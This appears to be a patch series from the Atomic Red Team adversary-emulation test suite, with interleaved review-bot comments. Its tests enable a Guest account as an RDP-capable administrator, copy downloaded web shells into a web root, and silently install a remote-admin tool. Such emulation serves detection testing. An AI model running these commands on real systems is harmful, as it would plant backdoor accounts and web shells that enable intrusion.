diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index f7877e90..8faf5fae 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -217,7 +217,7 @@ defense-evasion,T1564.001,Hidden Files and Directories,3,Create Windows System F defense-evasion,T1564.001,Hidden Files and Directories,4,Create Windows Hidden File with Attrib,dadb792e-4358-4d8d-9207-b771faa0daa5,command_prompt defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell -defense-evasion,T1564,Hide Artifacts,2,"Create a user called ""$"" as noted here",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt +defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index c79dc4ab..376d32e7 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -579,7 +579,7 @@ - Atomic Test #1: Hidden Window [windows] - [T1564 Hide Artifacts](../../T1564/T1564.md) - Atomic Test #1: Extract binary files via VBA [windows] - - Atomic Test #2: Create a user called "$" as noted here [windows] + - Atomic Test #2: Create a Hidden User Called "$" [windows] - Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows] - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1562.003 Impair Command History Logging](../../T1562.003/T1562.003.md) 
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 5441311e..66cd7ded 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -410,7 +410,7 @@ - Atomic Test #1: Hidden Window [windows] - [T1564 Hide Artifacts](../../T1564/T1564.md) - Atomic Test #1: Extract binary files via VBA [windows] - - Atomic Test #2: Create a user called "$" as noted here [windows] + - Atomic Test #2: Create a Hidden User Called "$" [windows] - Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows] - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1562.003 Impair Command History Logging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index d83f2365..8b99c367 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -25291,7 +25291,7 @@ defense-evasion: ' name: powershell - - name: Create a user called "$" as noted here + - name: Create a Hidden User Called "$" auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778 description: Creating a user with a username containing "$" supported_platforms: diff --git a/atomics/T1564/T1564.md b/atomics/T1564/T1564.md index c2d9c76d..333370c2 100644 --- a/atomics/T1564/T1564.md +++ b/atomics/T1564/T1564.md 
@@ -8,7 +8,7 @@ Adversaries may also attempt to hide artifacts associated with malicious behavio - [Atomic Test #1 - Extract binary files via VBA](#atomic-test-1---extract-binary-files-via-vba) -- [Atomic Test #2 - Create a user called "$" as noted here](#atomic-test-2---create-a-user-called--as-noted-here) +- [Atomic Test #2 - Create a Hidden User Called "$"](#atomic-test-2---create-a-hidden-user-called-) - [Atomic Test #3 - Create an "Administrator " user (with a space on the end)](#atomic-test-3---create-an-administrator--user-with-a-space-on-the-end) @@ -73,7 +73,7 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir

-## Atomic Test #2 - Create a user called "$" as noted here +## Atomic Test #2 - Create a Hidden User Called "$" Creating a user with a username containing "$" **Supported Platforms:** Windows From 358d58bad52900d2c0c39a195f13b32ac9b6976e Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Thu, 17 Jun 2021 07:07:56 -0600 Subject: [PATCH 54/84] add note about secure boot (#1524) --- atomics/T1546.010/T1546.010.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/atomics/T1546.010/T1546.010.yaml b/atomics/T1546.010/T1546.010.yaml index acaa9658..f5e70f99 100644 --- a/atomics/T1546.010/T1546.010.yaml +++ b/atomics/T1546.010/T1546.010.yaml @@ -7,7 +7,9 @@ atomic_tests: AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system. Upon succesfully execution, you will see the message "The operation completed successfully." Each time the DLL is loaded, you will see a message box with a message of "Install AppInit Shim DLL was called!" appear. This will happen regularly as your computer starts up various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify the - AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up + AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up. + + Note: If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls supported_platforms: - windows input_arguments: From e7e57790256be024aef4c6920312c53ff2ec42ec Mon Sep 17 00:00:00 2001 
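Review bot: The added sentence tells the reader the test cannot work under Secure Boot, but nothing in the test enforces it, so on such a host the registry write still succeeds, the run looks like a pass, and no DLL is ever loaded — a false positive for anyone using the test to validate detections. Consider turning the note into a dependency with a prereq check, e.g. `prereq_command: try { if (Confirm-SecureBootUEFI) { exit 1 } } catch {}; exit 0` paired with a `get_prereq_command` that echoes that Secure Boot must be disabled, so the runner reports an unmet prerequisite instead of a silent non-event. The test's executor and any existing dependencies stanza are outside this hunk, so the dependency executor may need to be named as powershell. The index.yaml and T1546.010.md copies in the following doc-generator commit are generated and will follow on their own.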
From: CircleCI Atomic Red Team doc generator Date: Thu, 17 Jun 2021 13:08:27 +0000 Subject: [PATCH 55/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 6 ++++-- atomics/T1546.010/T1546.010.md | 4 +++- 2 files changed, 7 insertions(+), 3 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 8b99c367..ecf12813 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -9349,7 +9349,8 @@ privilege-escalation: computer starts up various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify the \nAppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup - commands afterwards so you don't keep getting message boxes showing up\n" + commands afterwards so you don't keep getting message boxes showing up.\n\nNote: + If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls\n" supported_platforms: - windows input_arguments: @@ -37163,7 +37164,8 @@ persistence: computer starts up various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify the \nAppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup - commands afterwards so you don't keep getting message boxes showing up\n" + commands afterwards so you don't keep getting message boxes showing up.\n\nNote: + If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls\n" supported_platforms: - windows input_arguments: diff --git a/atomics/T1546.010/T1546.010.md b/atomics/T1546.010/T1546.010.md index d0d2cd8b..6a34b973 100644 --- a/atomics/T1546.010/T1546.010.md +++ b/atomics/T1546.010/T1546.010.md 
@@ -17,7 +17,9 @@ The AppInit DLL functionality is disabled in Windows 8 and later versions when s AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system. Upon succesfully execution, you will see the message "The operation completed successfully." Each time the DLL is loaded, you will see a message box with a message of "Install AppInit Shim DLL was called!" appear. This will happen regularly as your computer starts up various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify the -AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up +AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up. + +Note: If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls **Supported Platforms:** Windows From 7a17072dd36200e14c6471ebb0d159b0eb54b6aa Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Thu, 17 Jun 2021 07:10:51 -0600 Subject: [PATCH 56/84] don't disable rdp during cleanup by default (#1523) Co-authored-by: Michael Haag <5632822+MHaggis@users.noreply.github.com> --- atomics/T1078.001/T1078.001.yaml | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/atomics/T1078.001/T1078.001.yaml b/atomics/T1078.001/T1078.001.yaml index 3bc650f3..fef6894e 100644 --- a/atomics/T1078.001/T1078.001.yaml +++ b/atomics/T1078.001/T1078.001.yaml 
@@ -3,7 +3,9 @@ display_name: 'Valid Accounts: Default Accounts'
 atomic_tests:
 - name: Enable Guest account with RDP capability and admin priviliges
 auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
- description: After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, and desktop will allow multiple RDP connections
+ description: |
+ After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
+ and desktop will allow multiple RDP connections.
 supported_platforms:
 - windows
 input_arguments:
@@ -15,6 +17,10 @@ atomic_tests:
 description: Specify the guest password
 type: String
 default: Password123!
+ remove_rdp_access_during_cleanup:
+ description: Set to 1 if you want the cleanup to remove RDP access to machine
+ type: Integer
+ default: 0
 executor:
 command: |-
 net user #{guest_user} /active:yes
@@ -27,7 +33,8 @@ atomic_tests:
 net user #{guest_user} /active:no >nul 2>&1
 net localgroup administrators #{guest_user} /delete >nul 2>&1
 net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1
- reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1
- reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1
+ if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
+ if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
+ if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
 name: command_prompt
 elevation_required: true
From a0e012ee099d5d354399e17246acbedb63b80a7a Mon Sep 17 00:00:00 2001
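Review bot: The cleanup in the last hunk now leaves the host with RDP enabled after an elevated run unless `remove_rdp_access_during_cleanup` is set, but the description rewritten in the first hunk does not say so, and the argument's own description reads as if RDP access is restored when in fact the two registry values are deleted. Suggest appending to the description: `Note: by default the cleanup leaves the RDP registry changes in place; set remove_rdp_access_during_cleanup to 1 to delete the fDenyTSConnections and AllowTSConnections values (they are deleted, not restored to their previous values).` For the same reason the argument description could read `Set to 1 to have the cleanup delete the Terminal Server registry values the test added (RDP stays enabled when 0)`. The new `description: |` keeps a trailing newline where the neighbouring `command: |-` strips it; `|-` would be consistent. The copies in index.yaml and T1078.001.md in the following doc-generator commit are generated and will follow on their own.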
From: CircleCI Atomic Red Team doc generator Date: Thu, 17 Jun 2021 13:11:19 +0000 Subject: [PATCH 57/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 60 ++++++++++++++++++++++------------ atomics/T1078.001/T1078.001.md | 9 +++-- 2 files changed, 46 insertions(+), 23 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index ecf12813..075a05dd 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -11430,9 +11430,9 @@ privilege-escalation: atomic_tests: - name: Enable Guest account with RDP capability and admin priviliges auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 - description: After execution the Default Guest account will be enabled (Active) - and added to Administrators and Remote Desktop Users Group, and desktop will - allow multiple RDP connections + description: | + After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, + and desktop will allow multiple RDP connections. supported_platforms: - windows input_arguments: @@ -11444,6 +11444,10 @@ privilege-escalation: description: Specify the guest password type: String default: Password123! + remove_rdp_access_during_cleanup: + description: Set to 1 if you want the cleanup to remove RDP access to machine + type: Integer + default: 0 executor: command: |- net user #{guest_user} /active:yes 
@@ -11456,8 +11460,9 @@ privilege-escalation: net user #{guest_user} /active:no >nul 2>&1 net localgroup administrators #{guest_user} /delete >nul 2>&1 net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1 - reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1 - reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1 + if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup) + if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1) + if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1) name: command_prompt elevation_required: true T1078.002: @@ -21649,9 +21654,9 @@ defense-evasion: atomic_tests: - name: Enable Guest account with RDP capability and admin priviliges auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 - description: After execution the Default Guest account will be enabled (Active) - and added to Administrators and Remote Desktop Users Group, and desktop will - allow multiple RDP connections + description: | + After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, + and desktop will allow multiple RDP connections. supported_platforms: - windows input_arguments: @@ -21663,6 +21668,10 @@ defense-evasion: description: Specify the guest password type: String default: Password123! + remove_rdp_access_during_cleanup: + description: Set to 1 if you want the cleanup to remove RDP access to machine + type: Integer + default: 0 executor: command: |- net user #{guest_user} /active:yes 
@@ -21675,8 +21684,9 @@ defense-evasion: net user #{guest_user} /active:no >nul 2>&1 net localgroup administrators #{guest_user} /delete >nul 2>&1 net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1 - reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1 - reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1 + if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup) + if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1) + if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1) name: command_prompt elevation_required: true T1578.003: @@ -39427,9 +39437,9 @@ persistence: atomic_tests: - name: Enable Guest account with RDP capability and admin priviliges auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 - description: After execution the Default Guest account will be enabled (Active) - and added to Administrators and Remote Desktop Users Group, and desktop will - allow multiple RDP connections + description: | + After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, + and desktop will allow multiple RDP connections. supported_platforms: - windows input_arguments: @@ -39441,6 +39451,10 @@ persistence: description: Specify the guest password type: String default: Password123! + remove_rdp_access_during_cleanup: + description: Set to 1 if you want the cleanup to remove RDP access to machine + type: Integer + default: 0 executor: command: |- net user #{guest_user} /active:yes 
@@ -39453,8 +39467,9 @@ persistence: net user #{guest_user} /active:no >nul 2>&1 net localgroup administrators #{guest_user} /delete >nul 2>&1 net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1 - reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1 - reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1 + if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup) + if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1) + if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1) name: command_prompt elevation_required: true T1136.002: @@ -67406,9 +67421,9 @@ initial-access: atomic_tests: - name: Enable Guest account with RDP capability and admin priviliges auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 - description: After execution the Default Guest account will be enabled (Active) - and added to Administrators and Remote Desktop Users Group, and desktop will - allow multiple RDP connections + description: | + After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, + and desktop will allow multiple RDP connections. supported_platforms: - windows input_arguments: @@ -67420,6 +67435,10 @@ initial-access: description: Specify the guest password type: String default: Password123! + remove_rdp_access_during_cleanup: + description: Set to 1 if you want the cleanup to remove RDP access to machine + type: Integer + default: 0 executor: command: |- net user #{guest_user} /active:yes 
@@ -67432,8 +67451,9 @@ initial-access: net user #{guest_user} /active:no >nul 2>&1 net localgroup administrators #{guest_user} /delete >nul 2>&1 net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1 - reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1 - reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1 + if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup) + if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1) + if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1) name: command_prompt elevation_required: true T1078.002: diff --git a/atomics/T1078.001/T1078.001.md b/atomics/T1078.001/T1078.001.md index c2c4a3b6..4ed80952 100644 --- a/atomics/T1078.001/T1078.001.md +++ b/atomics/T1078.001/T1078.001.md @@ -12,7 +12,8 @@ Default accounts are not limited to client machines, rather also include account
## Atomic Test #1 - Enable Guest account with RDP capability and admin priviliges -After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, and desktop will allow multiple RDP connections +After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group, +and desktop will allow multiple RDP connections. **Supported Platforms:** Windows @@ -24,6 +25,7 @@ After execution the Default Guest account will be enabled (Active) and added to |------|-------------|------|---------------| | guest_user | Specify the guest account | String | guest| | guest_password | Specify the guest password | String | Password123!| +| remove_rdp_access_during_cleanup | Set to 1 if you want the cleanup to remove RDP access to machine | Integer | 0| #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) @@ -43,8 +45,9 @@ reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConne net user #{guest_user} /active:no >nul 2>&1 net localgroup administrators #{guest_user} /delete >nul 2>&1 net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1 -reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1 -reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1 +if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup) +if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1) +if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1) ``` From 5b6f89f30fae51483d0861238cc3501d6f126cd5 Mon Sep 17 00:00:00 2001 
From: Carrie Roberts Date: Tue, 22 Jun 2021 09:46:01 -0600 Subject: [PATCH 58/84] safer cleanup, correct filename (#1526) --- atomics/T1505.003/T1505.003.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/atomics/T1505.003/T1505.003.yaml b/atomics/T1505.003/T1505.003.yaml index bc9476b0..066dafd1 100644 --- a/atomics/T1505.003/T1505.003.yaml +++ b/atomics/T1505.003/T1505.003.yaml @@ -27,12 +27,14 @@ atomic_tests: get_prereq_command: | New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp" - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/test.jsp" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/tests.jsp" Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx" executor: command: | - xcopy #{web_shells} #{web_shell_path} + xcopy /I /Y #{web_shells} #{web_shell_path} cleanup_command: | - del #{web_shell_path} /q >nul 2>&1 + del #{web_shell_path}\b.jsp /q >nul 2>&1 + del #{web_shell_path}\tests.jsp /q >nul 2>&1 + del #{web_shell_path}\cmd.aspx /q >nul 2>&1 name: command_prompt From 722cc9a29233bfcb614a0989316471c4e8272d6c Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 22 Jun 2021 15:46:20 +0000 Subject: [PATCH 59/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 11 ++++++----- atomics/T1505.003/T1505.003.md | 8 +++++--- 2 files changed, 11 insertions(+), 8 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 075a05dd..cf4dc78e 100644 --- a/atomics/Indexes/index.yaml 
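Review bot: The new cleanup deletes only `b.jsp`, `tests.jsp` and `cmd.aspx`, but `xcopy /I /Y` copies everything in `#{web_shells}`, and the prereq check (outside this hunk; the generated doc shows it as `if (Test-Path #{web_shells}) {exit 0}`) only tests that the directory exists, so a host that ran the earlier version still holds the old `test.jsp`, gets it copied into the web root, and is left with an unremoved web shell after cleanup. Either add `del #{web_shell_path}\test.jsp /q >nul 2>&1` to the cleanup, or tighten the prereq check to require the three files so `get_prereq_command` re-downloads them. Copying the three files by name instead of the whole directory would also keep the executor and the cleanup in step.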
+++ b/atomics/Indexes/index.yaml @@ -46120,15 +46120,16 @@ persistence: get_prereq_command: | New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp" - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/test.jsp" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/tests.jsp" Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx" executor: - command: 'xcopy #{web_shells} #{web_shell_path} - -' - cleanup_command: 'del #{web_shell_path} /q >nul 2>&1 + command: 'xcopy /I /Y #{web_shells} #{web_shell_path} ' + cleanup_command: | + del #{web_shell_path}\b.jsp /q >nul 2>&1 + del #{web_shell_path}\tests.jsp /q >nul 2>&1 + del #{web_shell_path}\cmd.aspx /q >nul 2>&1 name: command_prompt T1546.003: technique: diff --git a/atomics/T1505.003/T1505.003.md b/atomics/T1505.003/T1505.003.md index 5749d721..d10a868f 100644 --- a/atomics/T1505.003/T1505.003.md +++ b/atomics/T1505.003/T1505.003.md @@ -32,12 +32,14 @@ cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/ ```cmd -xcopy #{web_shells} #{web_shell_path} +xcopy /I /Y #{web_shells} #{web_shell_path} ``` #### Cleanup Commands: ```cmd -del #{web_shell_path} /q >nul 2>&1 +del #{web_shell_path}\b.jsp /q >nul 2>&1 +del #{web_shell_path}\tests.jsp /q >nul 2>&1 +del #{web_shell_path}\cmd.aspx /q >nul 2>&1 ``` 
@@ -52,7 +54,7 @@ if (Test-Path #{web_shells}) {exit 0} else {exit 1} ```powershell New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp" -Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/test.jsp" +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/tests.jsp" Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx" ``` From 262f16a69f5602513d0c62184de11568bffcec9f Mon Sep 17 00:00:00 2001 From: tlor89 <60741301+tlor89@users.noreply.github.com> Date: Wed, 23 Jun 2021 11:31:11 -0500 Subject: [PATCH 60/84] T1072 (#1527) Co-authored-by: Toua Lor Co-authored-by: Carrie Roberts --- atomics/T1072/T1072.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 atomics/T1072/T1072.yaml diff --git a/atomics/T1072/T1072.yaml b/atomics/T1072/T1072.yaml new file mode 100644 index 00000000..fa89473e --- /dev/null +++ b/atomics/T1072/T1072.yaml 
@@ -0,0 +1,33 @@
+attack_technique: T1072
+display_name: Software Deployment Tools
+atomic_tests:
+- name: Radmin Viewer Utility
+ description: |
+ An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console.
+ supported_platforms:
+ - windows
+ input_arguments:
+ radmin_installer:
+ description: Radmin Viewer installer
+ type: Path
+ default: '%TEMP%\RadminViewer.msi'
+ radmin_exe:
+ description: The radmin.exe executable from RadminViewer.msi
+ type: Path
+ default: '%PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe'
+
+ dependencies:
+ - description: |
+ Radmin Viewer Utility must be installed at specified location (#{radmin_exe})
+ prereq_command: |
+ if not exist "#{radmin_exe}" (exit /b 1)
+ get_prereq_command: |
+ echo Downloading radmin installer
+ bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer}
+ msiexec /i "#{radmin_installer}" /qn
+
+ executor:
+ name: command_prompt
+ elevation_required: true
+ command: |
+ "#{radmin_exe}"
\ No newline at end of file
From ee20a80a3d48225d473a32bba28b4850cd46d2ca Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator
Date: Wed, 23 Jun 2021 16:31:35 +0000
Subject: [PATCH 61/84] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
---
 atomics/T1072/T1072.yaml | 1 +
 atomics/used_guids.txt | 1 +
 2 files changed, 2 insertions(+)
diff --git a/atomics/T1072/T1072.yaml b/atomics/T1072/T1072.yaml
index fa89473e..cecdcede 100644
--- a/atomics/T1072/T1072.yaml
+++ b/atomics/T1072/T1072.yaml
@@ -2,6 +2,7 @@ attack_technique: T1072
 display_name: Software Deployment Tools
 atomic_tests:
 - name: Radmin Viewer Utility
+ auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129
 description: |
 An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console.
 supported_platforms:
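Review bot: `get_prereq_command` downloads an MSI and installs it silently with `msiexec /i ... /qn` under elevation without any integrity check, so a tampered download or a changed file behind the vendor URL is installed as admin on every host that runs the prerequisite; since the version is pinned in the URL, compare the file hash before installing, e.g. `certutil -hashfile "#{radmin_installer}" SHA256 | findstr /i <EXPECTED_SHA256_PLACEHOLDER> || exit /b 1`, or verify the Authenticode signature. There is no `cleanup_command`, so the Radmin console started by the executor keeps running and the package stays installed after the test; `taskkill /IM Radmin.exe /F >nul 2>&1` followed by `msiexec /x "#{radmin_installer}" /qn` would cover both, with the caveat that the installer path under %TEMP% may not survive until cleanup. The two `default:` paths mix `\` and `/` separators, and the file ends without a trailing newline.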
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index ba1c4cac..d6e53f28 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -721,3 +721,4 @@ d546a3d9-0be5-40c7-ad82-5a7d79e1b66b
 812c3ab8-94b0-4698-a9bf-9420af23ce24
 afedc8c4-038c-4d82-b3e5-623a95f8a612
